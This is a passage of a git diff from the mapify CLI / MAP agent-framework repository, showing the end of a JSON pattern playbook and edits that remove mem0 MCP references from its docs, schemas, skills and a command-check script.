**Test Suite**: Run full test suite locally:\n ```bash\n pytest tests/ --cov=src/mapify_cli --cov-report=term-missing\n ```\n Expected: 100% test pass rate, coverage ≥85%.\n\n\n\n\n# Release Checklist v{{VERSION}}\n\n## Phase 1: Pre-Release (~30-45 min)\n\n- [ ] Run test suite:\n ```bash\n pytest tests/ --cov=src/mapify_cli --cov-report=term-missing\n ```\n Expected: ✅ 100% pass, coverage ≥85%\n```", - "tags": [ - "documentation", - "multi-file", - "consistency", - "sync", - "html-comments", - "drift-prevention", - "code-review", - "git", - "maintenance" - ], - "related_bullets": [ - "doc-0003", - "doc-0004", - "doc-0016" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0020", - "content": "Agent Template Decision Aids: When adding new fields/sections to agent templates, include decision tables or checklists to guide agents in populating fields correctly. Example: test_strategy field needs 'Test Layer Decision Table' showing what tests are required for each subtask type. Structure: rows = scenarios (subtask types, complexity levels), columns = field sub-values (unit/integration/E2E required/optional/N/A), cells = specific guidance. Place decision table immediately after field definition, before examples section. 
This prevents field misuse and calibrates agent judgment across different contexts.", - "code_example": "```markdown\n# ❌ INCORRECT - Field without decision aid\n### test_strategy (required)\nDescribe what tests are needed for this subtask.\n\n# ✅ CORRECT - Field with decision table\n### test_strategy (required)\nDescribe what tests are needed for this subtask.\n\n**Test Layer Decision Table**:\n\n| Subtask Type | Unit Tests | Integration Tests | E2E Tests |\n|-------------|-----------|------------------|-----------|\n| **Data Model** | **REQUIRED**: Field validation, defaults | **REQUIRED**: FK integrity | **N/A** - model only |\n| **API Endpoint** | **REQUIRED**: Request validation | **REQUIRED**: Service calls | **REQUIRED**: Full HTTP flow |\n| **Utility Function** | **REQUIRED**: Pure function tests | **N/A** - no external deps | **N/A** - not user-facing |\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196271Z", - "last_used_at": null, - "related_to": [ - "arch-0004" - ], - "tags": [ - "agent-templates", - "decision-aids", - "documentation-pattern", - "usability", - "tables" - ] - }, - { - "id": "doc-0021", - "content": "Complexity Ladder Examples for Scoring Systems: When introducing numeric scoring systems (1-10 scales, complexity ratings), provide 'ladder examples' showing what each score looks like for domain-specific scenarios. Prevents score inflation/deflation and calibrates agents. Create 3-5 examples spanning the scoring range (low/medium/high). Each example: (1) Score with label (Simple/Moderate/Complex), (2) Concrete scenario from project domain, (3) Justification linking scenario to scoring criteria with arithmetic. 
Update examples as project evolves to reflect actual complexity distribution observed in completed subtasks.", - "code_example": "```markdown\n# ❌ INCORRECT - Abstract scoring guide\ncomplexity_score: Rate 1-10 based on task difficulty.\n\n# ✅ CORRECT - Calibrated ladder examples\ncomplexity_score: Rate 1-10 based on task difficulty.\n\n**Complexity Ladder (1-10 Scale)**:\n\n- **Score 2 (Simple)**: Add logging statement to existing function\n - *Rationale*: Base 1 (trivial change) + 1 (requires understanding function context)\n\n- **Score 5 (Moderate)**: Add new field to Django model with foreign key\n - *Rationale*: Base 3 (CRUD) + 1 (foreign key) + 1 (migration complexity)\n\n- **Score 8 (Complex)**: Implement caching layer with Redis\n - *Rationale*: Base 5 (new subsystem) + 1 (external dependency) + 1 (invalidation logic) + 1 (monitoring)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196282Z", - "last_used_at": null, - "related_to": [ - "doc-0020" - ], - "tags": [ - "scoring-systems", - "calibration", - "documentation-pattern", - "examples", - "agent-templates" - ] - }, - { - "id": "doc-0022", - "content": "Exit Code Documentation Hierarchy for CLI Tools: Prioritize documentation tiers by user impact - Tier 1 (CRITICAL): Primary user docs (USAGE.md, API reference) specify exit code contract for CI/CD automation; Tier 2 (IMPORTANT): Secondary docs (README.md examples) show common exit scenarios; Tier 3 (NICE-TO-HAVE): Inline help (--help output) provides quick reference. DO NOT block deployments on Tier 3 issues if Tier 1 is correct and complete. Pattern proven: Subtask 7 iteration 2 spent effort on --help text formatting (Tier 3) when USAGE.md exit codes (Tier 1) were already verified and accurate. 
Tier 1 correctness enables production automation - prioritize ruthlessly.", - "code_example": "```markdown\n# Tier 1: USAGE.md (API Contract)\n## Exit Codes\n- 0: Success\n- 1: Failure\n\n# Tier 2: README.md (Examples)\n```bash\nmap-cli cmd || exit 1\n```\n\n# Tier 3: --help (Quick Reference)\n```\nUsage: map-cli \n```\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T13:12:08.809242Z", - "last_used_at": "2025-10-27T13:12:08.809242Z", - "related_bullets": [ - "doc-0002", - "doc-0005", - "doc-0003" - ], - "tags": [ - "cli-tools", - "exit-codes", - "documentation-hierarchy", - "prioritization", - "ci-cd", - "api-contract" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0023", - "content": "Comprehensive Volume Creates False Authority: Extensive documentation without accuracy verification is MORE dangerous than incomplete documentation because volume signals authority and suppresses user skepticism. 190-line comprehensive docs with inaccurate exit codes break production CI/CD pipelines - users trust detailed documentation and skip independent verification. Better: Shorter accurate documentation that prompts users to verify edge cases than comprehensive inaccurate documentation that creates false confidence. Pattern proven: Subtask 7 iteration 1 produced 190-line comprehensive USAGE.md scoring 5.9/10 due to unverified exit code claims. 
Comprehensive inaccuracy is worse than acknowledged incompleteness because it breaks downstream automation silently.", - "code_example": "```markdown\n# ❌ DANGEROUS: 190 lines unverified\n## Exit Codes (UNVERIFIED)\n- 0: Success\n- 2: Invalid args ← WRONG\n...180 more unverified lines...\n# Result: CI/CD breaks silently\n\n# ✅ SAFE: 50 lines verified\n## Exit Codes (VERIFIED 2025-10-27)\n- 0: Success\n- 1: Failure\n**Note**: Verify for production: `cmd; echo $?`\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T13:12:08.809242Z", - "last_used_at": "2025-10-27T13:12:08.809242Z", - "related_bullets": [ - "doc-0002", - "doc-0008", - "doc-0005" - ], - "tags": [ - "documentation-quality", - "anti-pattern", - "false-authority", - "verification", - "accuracy-over-volume", - "ci-cd-safety" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0023", - "content": "Type-Annotated Documentation Placeholders: In CLI documentation, use '' format instead of bare '' to prevent copy-paste errors when visual form contradicts runtime type expectations. Critical for ID parameters where '' doesn't convey integer vs string distinction. Example: 'review_id: int' shows users the parameter expects integer type, preventing string-to-int conversion errors. This pattern makes type contracts explicit in documentation, reducing user errors from ambiguous placeholder syntax. 
Particularly important when documentation serves as copy-paste source for automation scripts.", - "code_example": "```markdown\n# ❌ AMBIGUOUS - Type not specified\n## Usage\nmark-review-complete \n\n# User copies literally, runtime fails:\n$ mark-review-complete \"abc123\" approved\nTypeError: review_id must be integer, got str\n\n# ✅ TYPE-ANNOTATED - Clear type contract\n## Usage\nmark-review-complete \n\n# User sees type requirement in docs:\n$ mark-review-complete 12345 approved # Correct: integer ID\n\n# Alternative format for optional parameters:\nmark-review-complete [--notes: str]\n\n# Code example showing parameter handling:\n@app.command('mark-review-complete')\ndef mark_complete(\n review_id: int = typer.Argument(...), # Type matches docs\n status: str = typer.Argument(...),\n notes: str = typer.Option(None, '--notes')\n):\n # Implementation matches documented signature\n pass\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T18:25:19.620391Z", - "last_used_at": "2025-10-27T18:25:19.620398Z", - "related_bullets": [ - "doc-0006" - ], - "tags": [ - "documentation", - "cli", - "type-safety", - "user-errors", - "parameter-specification" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-mcp-integration", - "content": "MCP Tool Integration Documentation Pattern: When documenting MCP tool integration in agent templates, use consistent 4-section structure across all agents: 1) When to Use (8+ examples with pattern matching), 2) Decision Context (how to decide when tool applies), 3) Thought Structure (expected output format from tool), 4) What to Look For (verification criteria). Apply identical structure to all agents using same MCP tool. Reduces cognitive load, enables pattern verification. 
Evidence: 8 MCP patterns documented with consistent structure made review trivial.", - "code_example": "```markdown\n## When to Use {Tool}\n- Pattern 1: [specific scenario]\n(minimum 8 patterns)\n\n## Decision Context\n1. Condition A (with threshold)\n(minimum 6 criteria)\n```", - "related_to": [ - "doc-0010" - ], - "tags": [ - "mcp-tools", - "documentation-structure", - "agent-templates", - "cognitive-load" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143921" - } - ] - }, - "RESEARCH_METHODOLOGY": { - "description": "Proven methodologies for technical research, verification, and knowledge discovery", - "bullets": [ - { - "id": "res-0001", - "content": "Three-Source Verification for Technical Research: When documenting tool behavior, library APIs, or technical specifications, use triangulation methodology combining (1) cipher_memory_search for existing cross-project knowledge, (2) context7/deepwiki MCP tools for current authoritative documentation (library APIs, framework guides), (3) bash commands for empirical verification on available platform (test -f for file claims, grep for code patterns, wc for quantities). Each source provides different confidence level: cipher (proven in production), docs (authoritative but potentially outdated), empirical (platform-specific but definitive). Triangulation catches documentation rot, prevents hallucination, and grounds recommendations in verifiable evidence. 
Mark verification level explicitly (VERIFIED, RESEARCHED, EXPECTED) so consumers understand claim strength.", - "code_example": "```markdown\n## Three-Source Verification Example\n\n### Research Question: Does MAP framework support custom agent roles?\n\n**Source 1 - Cipher Memory Search**:\n```bash\ncipher_memory_search(query=\"MAP framework custom agent roles\")\n# Result: No existing knowledge found\n# Confidence: UNKNOWN (no prior evidence)\n```\n\n**Source 2 - Authoritative Documentation** (context7/deepwiki):\n```bash\ndeepwiki_ask_question(\n repo=\"azalio/map-framework\",\n question=\"How to create custom agent roles beyond Actor/Monitor/Evaluator?\"\n)\n# Result: README mentions \"extensible agent system\"\n# Confidence: RESEARCHED (documented, not tested)\n```\n\n**Source 3 - Empirical Verification** (bash):\n```bash\n# Verify claim: \"custom agents defined in src/agents/\"\ntest -d src/agents && echo \"✅ Directory exists\" || echo \"❌ FAILED\"\nls src/agents/*.py | wc -l # Count: 7 agent implementations\ngrep -r \"class.*Agent\" src/agents/ # Find base class for custom agents\n# Result: BaseAgent class found with extension points\n# Confidence: VERIFIED (empirically confirmed on darwin platform)\n```\n\n**Final Documentation** (triangulated):\n\"MAP framework supports custom agent roles (VERIFIED). 
Custom agents extend\nBaseAgent class in src/agents/ (empirically confirmed: 7 implementations found).\nREADME describes system as 'extensible' (RESEARCHED in docs).\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-23T13:33:55.447315Z", - "last_used_at": "2025-10-23T13:33:55.447323Z", - "related_bullets": [ - "impl-0009", - "impl-0004" - ], - "tags": [ - "research-methodology", - "verification", - "triangulation", - "cipher", - "mcp-tools", - "context7", - "deepwiki", - "bash", - "documentation", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "CI_CD_PATTERNS": { - "description": "Patterns for continuous integration and deployment workflows", - "bullets": [ - { - "id": "ci-cd-0001", - "content": "Fail-Fast Validation Jobs with Dependency Blocking: Create dedicated lightweight validation jobs (version format, syntax checks, required files) that run before expensive operations (test matrix, builds, deployments). Use needs: [validate-job] to block downstream jobs until validation passes. 8-second validation failure is better than 5-minute test matrix failure consuming 4x runner minutes (ubuntu + macos, python 3.11 + 3.12). Place validation jobs at workflow start, make all other jobs depend on them. 
Prevents wasted CI resources and faster feedback on trivial errors.", - "code_example": "```yaml\n# .github/workflows/ci.yml\njobs:\n validate-version:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - name: Validate semver format\n run: |\n python3 -c \"import tomllib, re, sys; ...\"\n # 8 seconds, fails fast on invalid version\n\n test:\n needs: validate-version # ✅ Blocked until validation passes\n strategy:\n matrix:\n os: [ubuntu-latest, macos-latest]\n python-version: [\"3.11\", \"3.12\"]\n # 5+ minutes, only runs if validation succeeded\n\n build:\n needs: validate-version # ✅ Parallel with test, both blocked\n runs-on: ubuntu-latest\n # 3+ minutes, only runs if validation succeeded\n```", - "tags": [ - "ci-cd", - "github-actions", - "fail-fast", - "optimization", - "validation", - "job-dependencies" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:08:24.353122+00:00", - "last_used_at": "2025-10-26T08:08:24.353122+00:00", - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "CLI_TOOL_PATTERNS": { - "description": "Patterns and best practices for building CLI tools distributed via pip", - "bullets": [ - { - "id": "cli-0001", - "content": "Deployment Model as Explicit Requirement: When creating developer tools distributed via pip install, requirements MUST explicitly state accessibility model: 'Must be accessible to pip install users via CLI command' or 'Development-only script (not distributed)'. Agents validate functional correctness (code works) but cannot infer deployment constraints (how users access it). Missing deployment specification causes implementation-integration mismatch: excellent scripts/ implementation (9/10 quality) but inaccessible to pip users (4/10 completeness). Pattern proven: Subtask 7 scripts/validate-dependencies.py worked perfectly in dev but was excluded from pip package distribution. 
Add to Predictor template: 'How will end users execute this after pip install?' verification question.", - "code_example": "```python\n# ❌ INCOMPLETE REQUIREMENT - Missing deployment model\nrequirement = {\n \"goal\": \"Create dependency validator tool\",\n \"acceptance_criteria\": [\n \"Validates imports against pyproject.toml\",\n \"Reports missing dependencies\",\n \"Exit code 0 for success, 1 for failures\"\n ]\n}\n# Result: Actor implements in scripts/ (dev accessible), \n# but pip install users cannot execute it (not in package)\n\n# ✅ EXPLICIT DEPLOYMENT MODEL - Accessibility specified\nrequirement = {\n \"goal\": \"Create dependency validator tool\",\n \"deployment_model\": \"Must be accessible to pip install users via 'mapify validate-deps' CLI command\",\n \"accessibility_verification\": \"After 'pip install mapify-cli', run 'mapify validate-deps --help' succeeds\",\n \"acceptance_criteria\": [\n \"Validates imports against pyproject.toml\",\n \"Reports missing dependencies\",\n \"Exit code 0 for success, 1 for failures\",\n \"CLI entry point wired in pyproject.toml [project.scripts]\",\n \"Tool accessible via installed CLI command\"\n ]\n}\n# Result: Actor implements with CLI integration (accessible to all users)\n\n# Predictor Verification Checklist (add to template)\n## Deployment Accessibility Check\n- [ ] If requirement says 'CLI tool', verify entry point exists in pyproject.toml\n- [ ] If requirement says 'pip install users', verify not in scripts/ (excluded from distribution)\n- [ ] If dev-only script, verify documented as such (not user-facing)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:14:58.063144+00:00", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [ - "arch-0010", - "arch-0011" - ], - "tags": [ - "cli-tools", - "pip", - "deployment", - "requirements", - "predictor", - "accessibility", - "python", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - } - 
] - } - }, - "bullet_schema": { - "description": "Schema for each bullet in the playbook", - "example": { - "id": "impl-0001", - "content": "Detailed pattern description with context and rationale (minimum 100 characters)", - "code_example": "```python\n# Code demonstrating the pattern\nimport jwt\ntoken = jwt.decode(token, secret, algorithms=['HS256'], verify=True)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-10T00:00:00Z", - "last_used_at": "2025-10-10T00:00:00Z", - "related_bullets": [ - "sec-0012", - "sec-0034" - ], - "tags": [ - "python", - "jwt", - "authentication" - ], - "deprecated": false, - "deprecation_reason": null - } - }, - "usage_instructions": { - "for_actor": "Load relevant bullets via PlaybookManager.get_relevant_bullets(query). Use patterns in implementation. Track used bullet_ids in output.", - "for_reflector": "Analyze which bullets were helpful/harmful. Suggest new bullets for missing patterns. Tag bullets based on effectiveness.", - "for_curator": "Apply delta operations from Reflector insights. Add new bullets, update counters, deprecate harmful patterns. Run deduplication.", - "for_orchestrator": "Load playbook before Actor invocation. Pass relevant bullets as context. Trigger Reflector+Curator after each subtask completion." - }, - "maintenance": { - "deduplication_threshold": 0.9, - "deprecation_threshold": 3, - "sync_to_cipher_threshold": 5, - "max_bullets_per_section": 100, - "cleanup_schedule": "Monthly review of deprecated bullets with harmful_count >= deprecation_threshold" - } -} \ No newline at end of file diff --git a/.claude/references/mcp-usage-examples.md b/.claude/references/mcp-usage-examples.md index 4f1e42d..e42092a 100644 --- a/.claude/references/mcp-usage-examples.md +++ b/.claude/references/mcp-usage-examples.md @@ -4,36 +4,9 @@ Reference examples for task-decomposer agent. 
Loaded on demand for complex decom --- -## mcp__mem0__map_tiered_search Examples - -**Good Example - Decomposing "Add user authentication"**: -``` -Search: "feature implementation authentication" → find past auth implementations -Search: "task decomposition auth flow" → learn typical subtask breakdown -Result: Discover pattern (from tiered search across branch/project/org): - 1. User model (foundation) - 2. Password hashing (depends on user model) - 3. Login/logout endpoints (depends on password hashing) - 4. Session management (depends on endpoints) - 5. Auth middleware (depends on session) - 6. Protected routes (depends on middleware) - -Use this proven order instead of guessing. -``` - -**Bad Example - Decomposing without historical context**: -``` -Jump directly to listing subtasks -→ Miss critical dependency order (e.g., try to implement middleware before session management exists) -→ Overlook edge cases that past implementations revealed -→ Create subtasks that are too coarse or too granular -``` - ---- - ## sequential-thinking for Reasoning Examples -**When to use**: After mem0 search finds similar features +**When to use**: After finding similar features in existing codebase **Key Difference from Pattern Search**: - Pattern search → **Output**: "Here are the 5 subtasks for authentication" @@ -41,7 +14,7 @@ Jump directly to listing subtasks **Example: Decomposing "Add real-time notifications"** -**Step 1 - mcp__mem0__map_tiered_search (WHAT worked)**: +**Step 1 - Search for similar implementations (WHAT worked)**: ``` Query: "feature implementation notifications" Result: Found 3 past implementations with subtask lists: diff --git a/.claude/references/step-state-schema.md b/.claude/references/step-state-schema.md index 8b5c290..70a52c9 100644 --- a/.claude/references/step-state-schema.md +++ b/.claude/references/step-state-schema.md @@ -61,8 +61,7 @@ Current step set (linear order; some are conditional): 4. `1.56` CHOOSE_MODE 5. `1.6` INIT_STATE 6. 
`2.0` XML_PACKET -7. `2.1` MEM0_SEARCH -8. `2.2` RESEARCH (conditional) -9. `2.3` ACTOR -10. `2.4` MONITOR -11. `2.6` PREDICTOR (conditional) +7. `2.2` RESEARCH (conditional) +8. `2.3` ACTOR +9. `2.4` MONITOR +10. `2.6` PREDICTOR (conditional) diff --git a/.claude/references/workflow-state-schema.md b/.claude/references/workflow-state-schema.md index e490808..c7f7695 100644 --- a/.claude/references/workflow-state-schema.md +++ b/.claude/references/workflow-state-schema.md @@ -47,8 +47,6 @@ INITIALIZED → Workflow started, no subtask active ↓ XML_PACKET_CREATED → AI packet created for current subtask ↓ -CONTEXT_LOADED → mem0 tiered search completed - ↓ RESEARCH_DONE → Research agent completed (if 3+ files) ↓ ACTOR_CALLED → Actor agent generated implementation @@ -73,7 +71,6 @@ WORKFLOW_COMPLETE → All subtasks done, final verification pending Standard step names used in `completed_steps` arrays: - `"xml_packet"` - AI-friendly subtask packet created -- `"mem0_search"` - Context patterns retrieved from mem0 - `"research"` - Research agent analyzed codebase (optional, for 3+ files) - `"actor"` - Actor agent generated implementation - `"monitor"` - Monitor agent validated implementation @@ -109,9 +106,9 @@ Standard step names used in `completed_steps` arrays: "ST-001": ["xml_packet"] }, "pending_steps": { - "ST-001": ["mem0_search", "actor", "monitor", "tests", "linter"], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["actor", "monitor", "tests", "linter"], + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -126,12 +123,12 @@ Standard step names used in `completed_steps` arrays: "current_subtask": "ST-001", "current_state": "MONITOR_PASSED", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor"] + "ST-001": ["xml_packet", "actor", "monitor"] },
"pending_steps": { "ST-001": ["tests", "linter"], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -148,12 +145,12 @@ At this point, workflow-gate.py will **ALLOW** Edit/Write because both "actor" a "current_subtask": "ST-001", "current_state": "SUBTASK_COMPLETE", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "pending_steps": { "ST-001": [], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } diff --git a/.claude/skills/map-cli-reference/SKILL.md b/.claude/skills/map-cli-reference/SKILL.md index 13ba2b5..2a993c4 100644 --- a/.claude/skills/map-cli-reference/SKILL.md +++ b/.claude/skills/map-cli-reference/SKILL.md @@ -1,21 +1,18 @@ --- name: map-cli-reference description: >- - Quick reference for mapify CLI and mem0 MCP usage errors. Use when + Quick reference for mapify CLI usage errors. Use when encountering "no such command", "no such option", "parameter not found", - or when user asks "how to use mapify", "mem0 commands", "validate graph". + or when user asks "how to use mapify", "validate graph". Do NOT use for workflow selection (use map-workflows-guide) or planning methodology (use map-planning). 
metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP CLI Quick Reference -> **Note (v4.0+):** Pattern storage and retrieval uses mem0 MCP (tiered namespaces). - Fast lookup for commands, parameters, and common error corrections. **For comprehensive documentation**, see: @@ -26,16 +23,6 @@ Fast lookup for commands, parameters, and common error corrections. ## Quick Command Index -### Pattern Search (mem0 MCP) - -```bash -# Tiered search across namespaces (branch → project → org) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Use section_filter when you know the category -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ### Validate Commands ```bash @@ -75,58 +62,6 @@ mapify upgrade **Solution**: - The `playbook` command was removed in v4.0+ -- For pattern retrieval: use `mcp__mem0__map_tiered_search` -- For pattern writes: use `Task(subagent_type="curator", ...)` - ---- - -### Error 2: MCP Tool Not Available - -**Issue**: mem0 calls return empty results or tool invocation fails. - -**Solution**: -- Verify mem0 MCP is configured and enabled in `.claude/mcp_config.json` (or Claude settings) -- Confirm the org/project/branch namespaces match your workflow conventions - ---- - -### Error 3: Wrong Approach (CRITICAL) - -❌ **WRONG**: Writing patterns directly (ad-hoc scripts / manual storage) - -✅ **CORRECT**: Use Curator agent: - -```bash -Task(subagent_type="curator", ...) -``` - -Curator must: -- Search duplicates first via `mcp__mem0__map_tiered_search` -- Store new patterns via `mcp__mem0__map_add_pattern` -- Archive outdated patterns via `mcp__mem0__map_archive_pattern` - ---- - -## Integration with MAP Workflows (v4.0+) - -### Curator Agent - -**Role**: Stores patterns in mem0 MCP - -**Workflow**: -1. Curator analyzes reflector insights -2. Checks for duplicates via `mcp__mem0__map_tiered_search` -3. Stores new patterns via `mcp__mem0__map_add_pattern` -4. 
Archives outdated patterns via `mcp__mem0__map_archive_pattern` - -### Reflector Agent - -**Role**: Searches for existing patterns before extracting new ones - -**MCP tool used**: -```bash -mcp__mem0__map_tiered_search(query="error handling", limit=5) -``` --- @@ -156,10 +91,9 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Actions:** 1. Identify error type — removed command usage -2. Explain: `playbook` command was removed in v4.0+, replaced by mem0 MCP -3. Provide replacement: `mcp__mem0__map_tiered_search` for reads, `Task(subagent_type="curator", ...)` for writes +2. Explain: `playbook` command was removed in v4.0+ -**Result:** User switches to mem0 MCP tools, error resolved. +**Result:** User acknowledges the removed command. ### Example 2: Validating a dependency graph @@ -172,28 +106,15 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Result:** User validates their task plan and fixes dependency issues before running workflow. -### Example 3: mem0 MCP not responding - -**User says:** "mem0 tiered search returns empty results" - -**Actions:** -1. Check mem0 MCP configuration in `.claude/mcp_config.json` -2. Verify namespace conventions (org/project/branch) -3. Test with broad query: `mcp__mem0__map_tiered_search(query="test", limit=1)` - -**Result:** User identifies configuration issue and restores mem0 connectivity. 
- --- ## Troubleshooting | Issue | Cause | Solution | |-------|-------|----------| -| `No such command 'playbook'` | Removed in v4.0+ | Use `mcp__mem0__map_tiered_search` for pattern retrieval | +| `No such command 'playbook'` | Removed in v4.0+ | Command no longer available | | `No such option '--output'` | Wrong subcommand syntax | Check `mapify --help` for valid options | -| mem0 tool invocation fails | MCP server not configured | Add mem0 to `.claude/mcp_config.json` and restart | | `validate graph` exit code 2 | Malformed JSON input | Validate JSON with `python -m json.tool < file.json` | -| Patterns not persisting | Writing directly instead of via Curator | Always use `Task(subagent_type="curator", ...)` for pattern writes | | `mapify init` overwrites files | Using `--force` flag | Omit `--force` to preserve existing configuration | --- diff --git a/.claude/skills/map-cli-reference/scripts/check-command.sh b/.claude/skills/map-cli-reference/scripts/check-command.sh index 216c959..f7efaa4 100755 --- a/.claude/skills/map-cli-reference/scripts/check-command.sh +++ b/.claude/skills/map-cli-reference/scripts/check-command.sh @@ -31,11 +31,11 @@ if [ -z "$SUBCOMMAND" ]; then echo " validate - Validate dependency graphs" echo "" echo "Removed subcommands:" - echo " playbook - Removed in v4.0+ (use mem0 MCP)" + echo " playbook - Removed in v4.0+" exit 1 fi -# Removed subcommands (replaced by mem0 MCP in v4.0+) +# Removed subcommands REMOVED_COMMANDS="playbook" # Known valid commands @@ -44,16 +44,7 @@ VALID_COMMANDS="init check upgrade validate" # Check removed commands first for dep in $REMOVED_COMMANDS; do if [ "$SUBCOMMAND" = "$dep" ]; then - echo "ERROR: '$SUBCOMMAND' was removed in v4.0+ (use mem0 MCP instead)" - echo "" - echo "Replacements:" - case "$SUBCOMMAND" in - playbook) - echo " Pattern retrieval: mcp__mem0__map_tiered_search(query=\"...\", limit=5)" - echo " Pattern storage: Task(subagent_type=\"curator\", ...)" - echo " Pattern archival: 
mcp__mem0__map_archive_pattern(...)" - ;; - esac + echo "ERROR: '$SUBCOMMAND' was removed in v4.0+" exit 2 fi done diff --git a/.claude/skills/map-workflows-guide/SKILL.md b/.claude/skills/map-workflows-guide/SKILL.md index 6e5a1e5..5ad77c2 100644 --- a/.claude/skills/map-workflows-guide/SKILL.md +++ b/.claude/skills/map-workflows-guide/SKILL.md @@ -11,7 +11,6 @@ version: 1.0 metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP Workflows Guide @@ -79,14 +78,12 @@ Answer these 5 questions to find your workflow: - ✅ Basic validation (Monitor checks correctness) - ❌ NO quality scoring (Evaluator skipped) - ❌ NO impact analysis (Predictor skipped entirely) -- ❌ NO learning (Reflector/Curator skipped) +- ❌ NO learning (Reflector skipped) **Trade-offs:** - Saves 50-60% tokens vs full pipeline (every agent per subtask) -- mem0 never improves (no patterns stored) - Knowledge never accumulates - Minimal quality gates (only basic checks) -- Cannot reuse learned patterns in future tasks **Example tasks:** - "Fix a small validation edge case" @@ -121,11 +118,11 @@ Answer these 5 questions to find your workflow: - ✅ Impact analysis (Predictor runs conditionally) - ✅ Tests gate + Linter gate per subtask - ✅ Final-Verifier (adversarial verification at end) -- ✅ **Learning via /map-learn** (Reflector/Curator, optional after workflow) +- ✅ **Learning via /map-learn** (Reflector, optional after workflow) **Optimization strategy:** - **Conditional Predictor:** Runs only if risk detected (security, breaking changes) -- **Batched Learning:** Reflector/Curator run ONCE after all subtasks complete +- **Batched Learning:** Reflector runs ONCE after all subtasks complete - **Result:** 35-40% token savings vs full pipeline while preserving learning - **Same quality gates:** Monitor still validates each subtask @@ -151,7 +148,6 @@ Despite token optimization, preserves: - Per-subtask validation (Monitor always checks) - Complete implementation feedback loops - Full learning 
(batched, not skipped) -- mem0 pattern growth from all tasks **See also:** [resources/map-efficient-deep-dive.md](resources/map-efficient-deep-dive.md) @@ -171,7 +167,7 @@ Despite token optimization, preserves: - ✅ Validation (Monitor verifies fix) - ✅ Root cause analysis - ✅ Impact assessment (Predictor) -- ✅ Learning (Reflector/Curator) +- ✅ Learning (Reflector) **Specialized features:** - Error log analysis @@ -233,8 +229,7 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Actor** — Writes code and implements - Generates implementation - Makes file changes -- Uses existing patterns from mem0 -- Queries mem0 for relevant knowledge +- Uses existing patterns from previous workflows **Monitor** — Validates correctness - Checks implementation against criteria @@ -263,18 +258,10 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Reflector** — Pattern extraction - Analyzes what worked and failed - Extracts reusable patterns -- Searches mem0 for existing knowledge via `mcp__mem0__map_tiered_search` -- Prevents duplicate pattern storage +- Prevents duplicate pattern extraction - **Batched in /map-efficient** (runs once at end, via /map-learn) - **Skipped in /map-fast** (no learning) -**Curator** — Knowledge management -- Stores patterns in mem0 via `mcp__mem0__map_add_pattern` -- Deduplicates via tiered search -- Archives outdated patterns via `mcp__mem0__map_archive_pattern` -- Maintains pattern metadata -- **Batched in /map-efficient** (runs once at end) - ### Optional Agent **Documentation-Reviewer** — Documentation validation @@ -389,27 +376,6 @@ Predictor runs if: - High complexity estimated - Multiple files affected -**Q: How does the mem0 tiered memory system work?** - -A: mem0 MCP provides tiered pattern storage: - -**L1 (Branch-scoped)** -- Patterns specific to current feature branch -- Experimental patterns for current work -- Fastest access - -**L2 (Project-scoped)** -- Shared project 
